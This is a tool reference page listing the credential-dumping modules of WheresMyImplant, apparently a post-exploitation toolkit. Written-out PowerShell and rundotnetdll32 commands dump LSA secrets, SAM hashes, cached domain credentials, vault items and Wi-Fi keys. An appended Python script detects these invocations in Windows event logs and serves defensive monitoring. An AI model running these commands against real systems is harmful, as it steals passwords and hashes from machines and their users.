Credential Modules
Reads the LSA Secrets (e.g. plaintext service logon credentials) from the Windows Registry. Requires SYSTEM privileges.
[WheresMyImplant.Credentials]::DumpLSA()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpLSA
Reads the local user password hashes from the registry. Requires SYSTEM privileges.
[WheresMyImplant.Credentials]::DumpSAM()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpSAM
Reads the cached Domain User credentials. Requires SYSTEM privileges.
[WheresMyImplant.Credentials]::DumpDomainCache()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpDomainCache
Reads the Windows Vault for items stored with the DPAPI.
[WheresMyImplant.Credentials]::DumpVault()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpVault
Reads the Windows Vault for items stored with the DPAPI. This is an alternative method of accessing the Windows Vault.
[WheresMyImplant.Credentials]::DumpVaultCLI()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpVaultCLI
Reads wireless preshared keys from the stored wireless profiles.
[WheresMyImplant.Credentials]::WirelessPreSharedKey()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,WirelessPreSharedKey
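Both invocation forms listed above leave recognizable strings in process-creation (event 4688) and PowerShell script-block (event 4104) logs. The following is an added detection example, not part of WheresMyImplant or this wiki; the record shape, field names and sample events are assumptions constructed for illustration.

```python
import re

# Method names from the page's list; the first three are the ones it says need SYSTEM.
METHODS = ["DumpLSA", "DumpSAM", "DumpDomainCache",
           "DumpVault", "DumpVaultCLI", "WirelessPreSharedKey"]
NEEDS_SYSTEM = set(METHODS[:3])
CANONICAL = {m.lower(): m for m in METHODS}
_ALT = "|".join(sorted(METHODS, key=len, reverse=True))

# PowerShell form, e.g. [WheresMyImplant.Credentials]::DumpLSA()
PS_CALL = re.compile(
    r"\[\s*WheresMyImplant\.Credentials\s*\]\s*::\s*(" + _ALT + r")\b", re.I)
# Loader form: rundotnetdll32.exe <dll>,<namespace>,Credentials,<method>
# The DLL path and namespace are left open; only the argument shape is matched.
LOADER_CALL = re.compile(
    r"rundotnetdll32(?:\.exe)?[\"']?\s+[^,]+,[^,]+,Credentials,(" + _ALT + r")\b",
    re.I)

def scan(events):
    """Return one finding per credential-module invocation seen in the events."""
    findings = []
    for ev in events:
        text = ev.get("CommandLine") or ev.get("ScriptBlockText") or ""
        for form, rx in (("loader", LOADER_CALL), ("powershell", PS_CALL)):
            for m in rx.finditer(text):
                method = CANONICAL[m.group(1).lower()]
                findings.append({"host": ev.get("host"), "form": form,
                                 "method": method,
                                 "requires_system": method in NEEDS_SYSTEM})
    return findings

# Constructed sample records (not real telemetry); field names are assumed.
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 4688, "CommandLine":
     "rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpSAM"},
    {"host": "WS02", "event_id": 4104, "ScriptBlockText":
     "[wheresmyimplant.credentials]::DumpVaultCLI()"},
    {"host": "WS03", "event_id": 4688, "CommandLine":
     r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL"},
    {"host": "WS04", "event_id": 4688, "CommandLine":
     r'"C:\Temp\rundotnetdll32.exe" C:\Temp\a.dll,WheresMyImplant,Credentials,WirelessPreSharedKey'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
```

A hit on a method flagged `requires_system` means the calling process was expected to be running as SYSTEM, which is worth correlating with the process token in the same event.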